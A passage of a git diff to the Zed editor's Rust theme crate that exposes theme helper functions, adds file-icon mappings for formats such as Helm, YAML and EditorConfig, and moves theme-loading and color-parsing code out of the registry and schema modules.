use a partly-transparent version of the // foreground color for the background color. -pub(crate) fn apply_status_color_defaults(status: &mut StatusColorsRefinement) { +/// Applies default status color backgrounds from their foreground counterparts. 
+pub fn apply_status_color_defaults(status: &mut StatusColorsRefinement) { for (fg_color, bg_color) in [ (&status.deleted, &mut status.deleted_background), (&status.created, &mut status.created_background), @@ -42,7 +43,8 @@ pub(crate) fn apply_status_color_defaults(status: &mut StatusColorsRefinement) { } } -pub(crate) fn apply_theme_color_defaults( +/// Applies default theme color values derived from player colors. +pub fn apply_theme_color_defaults( theme_colors: &mut ThemeColorsRefinement, player_colors: &PlayerColors, ) { @@ -314,70 +316,70 @@ pub(crate) fn zed_default_dark() -> Theme { warning_border: yellow, }, player, - syntax: Arc::new(SyntaxTheme { - highlights: vec![ - ("attribute".into(), purple.into()), - ("boolean".into(), orange.into()), - ("comment".into(), gray.into()), - ("comment.doc".into(), gray.into()), - ("constant".into(), yellow.into()), - ("constructor".into(), blue.into()), - ("embedded".into(), HighlightStyle::default()), - ( - "emphasis".into(), - HighlightStyle { - font_style: Some(FontStyle::Italic), - ..HighlightStyle::default() - }, - ), - ( - "emphasis.strong".into(), - HighlightStyle { - font_weight: Some(FontWeight::BOLD), - ..HighlightStyle::default() - }, - ), - ("enum".into(), teal.into()), - ("function".into(), blue.into()), - ("function.method".into(), blue.into()), - ("function.definition".into(), blue.into()), - ("hint".into(), blue.into()), - ("keyword".into(), purple.into()), - ("label".into(), HighlightStyle::default()), - ("link_text".into(), blue.into()), - ( - "link_uri".into(), - HighlightStyle { - color: Some(teal), - font_style: Some(FontStyle::Italic), - ..HighlightStyle::default() - }, - ), - ("number".into(), orange.into()), - ("operator".into(), HighlightStyle::default()), - ("predictive".into(), HighlightStyle::default()), - ("preproc".into(), HighlightStyle::default()), - ("primary".into(), HighlightStyle::default()), - ("property".into(), red.into()), - ("punctuation".into(), HighlightStyle::default()), - 
("punctuation.bracket".into(), HighlightStyle::default()), - ("punctuation.delimiter".into(), HighlightStyle::default()), - ("punctuation.list_marker".into(), HighlightStyle::default()), - ("punctuation.special".into(), HighlightStyle::default()), - ("string".into(), green.into()), - ("string.escape".into(), HighlightStyle::default()), - ("string.regex".into(), red.into()), - ("string.special".into(), HighlightStyle::default()), - ("string.special.symbol".into(), HighlightStyle::default()), - ("tag".into(), HighlightStyle::default()), - ("text.literal".into(), HighlightStyle::default()), - ("title".into(), HighlightStyle::default()), - ("type".into(), teal.into()), - ("variable".into(), HighlightStyle::default()), - ("variable.special".into(), red.into()), - ("variant".into(), HighlightStyle::default()), - ], - }), + syntax: Arc::new(SyntaxTheme::new(vec![ + ("attribute".into(), purple.into()), + ("boolean".into(), orange.into()), + ("comment".into(), gray.into()), + ("comment.doc".into(), gray.into()), + ("constant".into(), yellow.into()), + ("constructor".into(), blue.into()), + ("embedded".into(), HighlightStyle::default()), + ( + "emphasis".into(), + HighlightStyle { + font_style: Some(FontStyle::Italic), + ..HighlightStyle::default() + }, + ), + ( + "emphasis.strong".into(), + HighlightStyle { + font_weight: Some(FontWeight::BOLD), + ..HighlightStyle::default() + }, + ), + ("enum".into(), teal.into()), + ("function".into(), blue.into()), + ("function.method".into(), blue.into()), + ("function.definition".into(), blue.into()), + ("hint".into(), blue.into()), + ("keyword".into(), purple.into()), + ("label".into(), HighlightStyle::default()), + ("link_text".into(), blue.into()), + ( + "link_uri".into(), + HighlightStyle { + color: Some(teal), + font_style: Some(FontStyle::Italic), + ..HighlightStyle::default() + }, + ), + ("number".into(), orange.into()), + ("operator".into(), HighlightStyle::default()), + ("predictive".into(), HighlightStyle::default()), + 
("preproc".into(), purple.into()), + ("primary".into(), HighlightStyle::default()), + ("property".into(), red.into()), + ("punctuation".into(), HighlightStyle::default()), + ("punctuation.bracket".into(), HighlightStyle::default()), + ("punctuation.delimiter".into(), HighlightStyle::default()), + ("punctuation.list_marker".into(), HighlightStyle::default()), + ("punctuation.special".into(), HighlightStyle::default()), + ("string".into(), green.into()), + ("string.escape".into(), HighlightStyle::default()), + ("string.regex".into(), red.into()), + ("string.special".into(), HighlightStyle::default()), + ("string.special.symbol".into(), HighlightStyle::default()), + ("tag".into(), HighlightStyle::default()), + ("text.literal".into(), HighlightStyle::default()), + ("title".into(), HighlightStyle::default()), + ("type".into(), teal.into()), + ("variable".into(), HighlightStyle::default()), + ("variable.special".into(), red.into()), + ("variant".into(), HighlightStyle::default()), + ("diff.plus".into(), green.into()), + ("diff.minus".into(), red.into()), + ])), }, } } diff --git a/crates/theme/src/icon_theme.rs b/crates/theme/src/icon_theme.rs index 8415462595cb93a19365a929660b4e8e3f78f8d8..314978218194895d802028be19a7b3bdb454bf9c 100644 --- a/crates/theme/src/icon_theme.rs +++ b/crates/theme/src/icon_theme.rs @@ -66,7 +66,7 @@ pub struct IconDefinition { } const FILE_STEMS_BY_ICON_KEY: &[(&str, &[&str])] = &[ - ("docker", &["Dockerfile"]), + ("docker", &["Containerfile", "Dockerfile"]), ("ruby", &["Podfile"]), ("heroku", &["Procfile"]), ]; @@ -89,7 +89,7 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ( "cpp", &[ - "c++", "h++", "cc", "cpp", "cxx", "hh", "hpp", "hxx", "inl", "ixx", + "c++", "h++", "cc", "cpp", "cppm", "cxx", "hh", "hpp", "hxx", "inl", "ixx", ], ), ("crystal", &["cr", "ecr"]), @@ -99,6 +99,15 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ("cue", &["cue"]), ("dart", &["dart"]), ("diff", &["diff"]), + ( + "docker", + &[ + 
"docker-compose.yml", + "docker-compose.yaml", + "compose.yml", + "compose.yaml", + ], + ), ( "document", &[ @@ -106,7 +115,8 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ "xlsx", ], ), - ("elixir", &["eex", "ex", "exs", "heex"]), + ("editorconfig", &["editorconfig"]), + ("elixir", &["eex", "ex", "exs", "heex", "leex", "neex"]), ("elm", &["elm"]), ( "erlang", @@ -138,12 +148,27 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ("font", &["otf", "ttf", "woff", "woff2"]), ("fsharp", &["fs"]), ("fsproj", &["fsproj"]), - ("gitlab", &["gitlab-ci.yml"]), + ("gitlab", &["gitlab-ci.yml", "gitlab-ci.yaml"]), ("gleam", &["gleam"]), ("go", &["go", "mod", "work"]), ("graphql", &["gql", "graphql", "graphqls"]), ("haskell", &["hs"]), ("hcl", &["hcl"]), + ( + "helm", + &[ + "helmfile.yaml", + "helmfile.yml", + "Chart.yaml", + "Chart.yml", + "Chart.lock", + "values.yaml", + "values.yml", + "requirements.yaml", + "requirements.yml", + "tpl", + ], + ), ("html", &["htm", "html"]), ( "image", @@ -198,7 +223,7 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ("rust", &["rs"]), ("sass", &["sass", "scss"]), ("scala", &["scala", "sc"]), - ("settings", &["conf", "ini", "yaml", "yml"]), + ("settings", &["conf", "ini"]), ("solidity", &["sol"]), ( "storage", @@ -279,6 +304,7 @@ const FILE_SUFFIXES_BY_ICON_KEY: &[(&str, &[&str])] = &[ ("vue", &["vue"]), ("vyper", &["vy", "vyi"]), ("wgsl", &["wgsl"]), + ("yaml", &["yaml", "yml"]), ("zig", &["zig"]), ]; @@ -303,6 +329,7 @@ const FILE_ICONS: &[(&str, &str)] = &[ ("diff", "icons/file_icons/diff.svg"), ("docker", "icons/file_icons/docker.svg"), ("document", "icons/file_icons/book.svg"), + ("editorconfig", "icons/file_icons/editorconfig.svg"), ("elixir", "icons/file_icons/elixir.svg"), ("elm", "icons/file_icons/elm.svg"), ("erlang", "icons/file_icons/erlang.svg"), @@ -310,12 +337,13 @@ const FILE_ICONS: &[(&str, &str)] = &[ ("font", "icons/file_icons/font.svg"), ("fsharp", "icons/file_icons/fsharp.svg"), ("fsproj", 
"icons/file_icons/file.svg"), - ("gitlab", "icons/file_icons/settings.svg"), + ("gitlab", "icons/file_icons/gitlab.svg"), ("gleam", "icons/file_icons/gleam.svg"), ("go", "icons/file_icons/go.svg"), ("graphql", "icons/file_icons/graphql.svg"), ("haskell", "icons/file_icons/haskell.svg"), ("hcl", "icons/file_icons/hcl.svg"), + ("helm", "icons/file_icons/helm.svg"), ("heroku", "icons/file_icons/heroku.svg"), ("html", "icons/file_icons/html.svg"), ("image", "icons/file_icons/image.svg"), @@ -371,6 +399,7 @@ const FILE_ICONS: &[(&str, &str)] = &[ ("vue", "icons/file_icons/vue.svg"), ("vyper", "icons/file_icons/vyper.svg"), ("wgsl", "icons/file_icons/wgsl.svg"), + ("yaml", "icons/file_icons/yaml.svg"), ("zig", "icons/file_icons/zig.svg"), ]; @@ -389,7 +418,7 @@ fn icon_keys_by_association( } /// The name of the default icon theme. -pub(crate) const DEFAULT_ICON_THEME_NAME: &str = "Zed (Default)"; +pub const DEFAULT_ICON_THEME_NAME: &str = "Zed (Default)"; static DEFAULT_ICON_THEME: LazyLock> = LazyLock::new(|| { Arc::new(IconTheme { diff --git a/crates/theme/src/registry.rs b/crates/theme/src/registry.rs index c362b62704257fefde125e81ca1c056490263b0b..fbe535309773fa5c90c2031d44b420cf5fad2dc7 100644 --- a/crates/theme/src/registry.rs +++ b/crates/theme/src/registry.rs @@ -1,20 +1,16 @@ use std::sync::Arc; use std::{fmt::Debug, path::Path}; -use anyhow::{Context as _, Result}; +use anyhow::Result; use collections::HashMap; use derive_more::{Deref, DerefMut}; -use fs::Fs; -use futures::StreamExt; use gpui::{App, AssetSource, Global, SharedString}; use parking_lot::RwLock; use thiserror::Error; -use util::ResultExt; use crate::{ Appearance, AppearanceContent, ChevronIcons, DEFAULT_ICON_THEME_NAME, DirectoryIcons, - IconDefinition, IconTheme, Theme, ThemeFamily, ThemeFamilyContent, default_icon_theme, - read_icon_theme, read_user_theme, refine_theme_family, + IconDefinition, IconTheme, IconThemeFamilyContent, Theme, ThemeFamily, default_icon_theme, }; /// The metadata for a 
theme. @@ -83,6 +79,11 @@ impl ThemeRegistry { cx.set_global(GlobalThemeRegistry(Arc::new(ThemeRegistry::new(assets)))); } + /// Returns the asset source used by this registry. + pub fn assets(&self) -> &dyn AssetSource { + self.assets.as_ref() + } + /// Creates a new [`ThemeRegistry`] with the given [`AssetSource`]. pub fn new(assets: Box) -> Self { let registry = Self { @@ -118,28 +119,21 @@ impl ThemeRegistry { self.state.write().extensions_loaded = true; } - fn insert_theme_families(&self, families: impl IntoIterator) { + /// Inserts the given theme families into the registry. + pub fn insert_theme_families(&self, families: impl IntoIterator) { for family in families.into_iter() { self.insert_themes(family.themes); } } - fn insert_themes(&self, themes: impl IntoIterator) { + /// Inserts the given themes into the registry. + pub fn insert_themes(&self, themes: impl IntoIterator) { let mut state = self.state.write(); for theme in themes.into_iter() { state.themes.insert(theme.name.clone(), Arc::new(theme)); } } - #[allow(unused)] - fn insert_user_theme_families(&self, families: impl IntoIterator) { - for family in families.into_iter() { - let refined_family = refine_theme_family(family); - - self.insert_themes(refined_family.themes); - } - } - /// Removes the themes with the given names from the registry. pub fn remove_user_themes(&self, themes_to_remove: &[SharedString]) { self.state @@ -183,60 +177,6 @@ impl ThemeRegistry { .cloned() } - /// Loads the themes bundled with the Zed binary and adds them to the registry. 
- pub fn load_bundled_themes(&self) { - let theme_paths = self - .assets - .list("themes/") - .expect("failed to list theme assets") - .into_iter() - .filter(|path| path.ends_with(".json")); - - for path in theme_paths { - let Some(theme) = self.assets.load(&path).log_err().flatten() else { - continue; - }; - - let Some(theme_family) = serde_json::from_slice(&theme) - .with_context(|| format!("failed to parse theme at path \"{path}\"")) - .log_err() - else { - continue; - }; - - self.insert_user_theme_families([theme_family]); - } - } - - /// Loads the user themes from the specified directory and adds them to the registry. - pub async fn load_user_themes(&self, themes_path: &Path, fs: Arc) -> Result<()> { - let mut theme_paths = fs - .read_dir(themes_path) - .await - .with_context(|| format!("reading themes from {themes_path:?}"))?; - - while let Some(theme_path) = theme_paths.next().await { - let Some(theme_path) = theme_path.log_err() else { - continue; - }; - - self.load_user_theme(&theme_path, fs.clone()) - .await - .log_err(); - } - - Ok(()) - } - - /// Loads the user theme from the specified path and adds it to the registry. - pub async fn load_user_theme(&self, theme_path: &Path, fs: Arc) -> Result<()> { - let theme = read_user_theme(theme_path, fs).await?; - - self.insert_user_theme_families([theme]); - - Ok(()) - } - /// Returns the default icon theme. pub fn default_icon_theme(&self) -> Result, IconThemeNotFoundError> { self.get_icon_theme(DEFAULT_ICON_THEME_NAME) @@ -273,18 +213,15 @@ impl ThemeRegistry { .retain(|name, _| !icon_themes_to_remove.contains(name)) } - /// Loads the icon theme from the specified path and adds it to the registry. + /// Loads the icon theme from the icon theme family and adds it to the registry. /// /// The `icons_root_dir` parameter indicates the root directory from which /// the relative paths to icons in the theme should be resolved against. 
- pub async fn load_icon_theme( + pub fn load_icon_theme( &self, - icon_theme_path: &Path, + icon_theme_family: IconThemeFamilyContent, icons_root_dir: &Path, - fs: Arc, ) -> Result<()> { - let icon_theme_family = read_icon_theme(icon_theme_path, fs).await?; - let resolve_icon_path = |path: SharedString| { icons_root_dir .join(path.as_ref()) diff --git a/crates/theme/src/schema.rs b/crates/theme/src/schema.rs index 61cf869b951ac4d285e1eaca42e226a6ac3e4a6a..56b89314a3442613890322cb7b9239fc7fc5b77e 100644 --- a/crates/theme/src/schema.rs +++ b/crates/theme/src/schema.rs @@ -1,30 +1,11 @@ #![allow(missing_docs)] -use gpui::{HighlightStyle, Hsla}; +use gpui::Hsla; use palette::FromColor; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; -use settings::IntoGpui; -pub use settings::{FontWeightContent, WindowBackgroundContent}; - -use crate::{StatusColorsRefinement, ThemeColorsRefinement}; - -fn ensure_non_opaque(color: Hsla) -> Hsla { - const MAXIMUM_OPACITY: f32 = 0.7; - if color.a <= MAXIMUM_OPACITY { - color - } else { - Hsla { - a: MAXIMUM_OPACITY, - ..color - } - } -} - -fn ensure_opaque(color: Hsla) -> Hsla { - Hsla { a: 1.0, ..color } -} +/// The appearance of a theme in serialized content. #[derive(Debug, PartialEq, Clone, Copy, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] pub enum AppearanceContent { @@ -32,819 +13,8 @@ pub enum AppearanceContent { Dark, } -/// The content of a serialized theme family. -#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] -pub struct ThemeFamilyContent { - pub name: String, - pub author: String, - pub themes: Vec, -} - -/// The content of a serialized theme. -#[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] -pub struct ThemeContent { - pub name: String, - pub appearance: AppearanceContent, - pub style: settings::ThemeStyleContent, -} - -/// Returns the syntax style overrides in the [`ThemeContent`]. 
-pub fn syntax_overrides(this: &settings::ThemeStyleContent) -> Vec<(String, HighlightStyle)> { - this.syntax - .iter() - .map(|(key, style)| { - ( - key.clone(), - HighlightStyle { - color: style - .color - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - background_color: style - .background_color - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - font_style: style.font_style.map(|s| s.into_gpui()), - font_weight: style.font_weight.map(|w| w.into_gpui()), - ..Default::default() - }, - ) - }) - .collect() -} - -pub fn status_colors_refinement(colors: &settings::StatusColorsContent) -> StatusColorsRefinement { - StatusColorsRefinement { - conflict: colors - .conflict - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - conflict_background: colors - .conflict_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - conflict_border: colors - .conflict_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - created: colors - .created - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - created_background: colors - .created_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - created_border: colors - .created_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - deleted: colors - .deleted - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - deleted_background: colors - .deleted_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - deleted_border: colors - .deleted_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - error: colors - .error - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - error_background: colors - .error_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - error_border: colors - .error_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hidden: colors - .hidden - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - 
hidden_background: colors - .hidden_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hidden_border: colors - .hidden_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hint: colors - .hint - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hint_background: colors - .hint_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - hint_border: colors - .hint_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ignored: colors - .ignored - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ignored_background: colors - .ignored_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ignored_border: colors - .ignored_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - info: colors - .info - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - info_background: colors - .info_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - info_border: colors - .info_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - modified: colors - .modified - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - modified_background: colors - .modified_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - modified_border: colors - .modified_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - predictive: colors - .predictive - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - predictive_background: colors - .predictive_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - predictive_border: colors - .predictive_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - renamed: colors - .renamed - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - renamed_background: colors - .renamed_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - renamed_border: colors - .renamed_border - 
.as_ref() - .and_then(|color| try_parse_color(color).ok()), - success: colors - .success - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - success_background: colors - .success_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - success_border: colors - .success_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - unreachable: colors - .unreachable - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - unreachable_background: colors - .unreachable_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - unreachable_border: colors - .unreachable_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - warning: colors - .warning - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - warning_background: colors - .warning_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - warning_border: colors - .warning_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - } -} - -pub fn theme_colors_refinement( - this: &settings::ThemeColorsContent, - status_colors: &StatusColorsRefinement, -) -> ThemeColorsRefinement { - let border = this - .border - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let editor_document_highlight_read_background = this - .editor_document_highlight_read_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let scrollbar_thumb_background = this - .scrollbar_thumb_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or_else(|| { - this.deprecated_scrollbar_thumb_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - }); - let scrollbar_thumb_hover_background = this - .scrollbar_thumb_hover_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let scrollbar_thumb_active_background = this - .scrollbar_thumb_active_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - 
.or(scrollbar_thumb_background); - let scrollbar_thumb_border = this - .scrollbar_thumb_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let element_hover = this - .element_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let panel_background = this - .panel_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let search_match_background = this - .search_match_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()); - let search_active_match_background = this - .search_active_match_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(search_match_background); - ThemeColorsRefinement { - border, - border_variant: this - .border_variant - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - border_focused: this - .border_focused - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - border_selected: this - .border_selected - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - border_transparent: this - .border_transparent - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - border_disabled: this - .border_disabled - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - elevated_surface_background: this - .elevated_surface_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - surface_background: this - .surface_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - background: this - .background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - element_background: this - .element_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - element_hover, - element_active: this - .element_active - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - element_selected: this - .element_selected - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - element_disabled: this - .element_disabled - .as_ref() - .and_then(|color| 
try_parse_color(color).ok()), - element_selection_background: this - .element_selection_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - drop_target_background: this - .drop_target_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - drop_target_border: this - .drop_target_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_background: this - .ghost_element_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_hover: this - .ghost_element_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_active: this - .ghost_element_active - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_selected: this - .ghost_element_selected - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - ghost_element_disabled: this - .ghost_element_disabled - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text: this - .text - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text_muted: this - .text_muted - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text_placeholder: this - .text_placeholder - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text_disabled: this - .text_disabled - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - text_accent: this - .text_accent - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon: this - .icon - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon_muted: this - .icon_muted - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon_disabled: this - .icon_disabled - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon_placeholder: this - .icon_placeholder - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - icon_accent: this - .icon_accent - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - debugger_accent: this - .debugger_accent - 
.as_ref() - .and_then(|color| try_parse_color(color).ok()), - status_bar_background: this - .status_bar_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - title_bar_background: this - .title_bar_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - title_bar_inactive_background: this - .title_bar_inactive_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - toolbar_background: this - .toolbar_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - tab_bar_background: this - .tab_bar_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - tab_inactive_background: this - .tab_inactive_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - tab_active_background: this - .tab_active_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - search_match_background: search_match_background, - search_active_match_background: search_active_match_background, - panel_background, - panel_focused_border: this - .panel_focused_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - panel_indent_guide: this - .panel_indent_guide - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - panel_indent_guide_hover: this - .panel_indent_guide_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - panel_indent_guide_active: this - .panel_indent_guide_active - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - panel_overlay_background: this - .panel_overlay_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(panel_background.map(ensure_opaque)), - panel_overlay_hover: this - .panel_overlay_hover - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(panel_background - .zip(element_hover) - .map(|(panel_bg, hover_bg)| panel_bg.blend(hover_bg)) - .map(ensure_opaque)), - pane_focused_border: this - .pane_focused_border - .as_ref() - .and_then(|color| 
try_parse_color(color).ok()), - pane_group_border: this - .pane_group_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(border), - scrollbar_thumb_background, - scrollbar_thumb_hover_background, - scrollbar_thumb_active_background, - scrollbar_thumb_border, - scrollbar_track_background: this - .scrollbar_track_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - scrollbar_track_border: this - .scrollbar_track_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - minimap_thumb_background: this - .minimap_thumb_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(scrollbar_thumb_background.map(ensure_non_opaque)), - minimap_thumb_hover_background: this - .minimap_thumb_hover_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(scrollbar_thumb_hover_background.map(ensure_non_opaque)), - minimap_thumb_active_background: this - .minimap_thumb_active_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(scrollbar_thumb_active_background.map(ensure_non_opaque)), - minimap_thumb_border: this - .minimap_thumb_border - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - .or(scrollbar_thumb_border), - editor_foreground: this - .editor_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_background: this - .editor_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_gutter_background: this - .editor_gutter_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_subheader_background: this - .editor_subheader_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_active_line_background: this - .editor_active_line_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_highlighted_line_background: this - .editor_highlighted_line_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - 
editor_debugger_active_line_background: this - .editor_debugger_active_line_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_line_number: this - .editor_line_number - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_hover_line_number: this - .editor_hover_line_number - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_active_line_number: this - .editor_active_line_number - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_invisible: this - .editor_invisible - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_wrap_guide: this - .editor_wrap_guide - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_active_wrap_guide: this - .editor_active_wrap_guide - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_indent_guide: this - .editor_indent_guide - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_indent_guide_active: this - .editor_indent_guide_active - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_document_highlight_read_background, - editor_document_highlight_write_background: this - .editor_document_highlight_write_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - editor_document_highlight_bracket_background: this - .editor_document_highlight_bracket_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()) - // Fall back to `editor.document_highlight.read_background`, for backwards compatibility. 
- .or(editor_document_highlight_read_background), - terminal_background: this - .terminal_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_background: this - .terminal_ansi_background - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_foreground: this - .terminal_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_bright_foreground: this - .terminal_bright_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_dim_foreground: this - .terminal_dim_foreground - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_black: this - .terminal_ansi_black - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_black: this - .terminal_ansi_bright_black - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_black: this - .terminal_ansi_dim_black - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_red: this - .terminal_ansi_red - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_red: this - .terminal_ansi_bright_red - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_red: this - .terminal_ansi_dim_red - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_green: this - .terminal_ansi_green - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_green: this - .terminal_ansi_bright_green - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_green: this - .terminal_ansi_dim_green - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_yellow: this - .terminal_ansi_yellow - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_bright_yellow: this - .terminal_ansi_bright_yellow - .as_ref() - .and_then(|color| try_parse_color(color).ok()), - terminal_ansi_dim_yellow: this - 
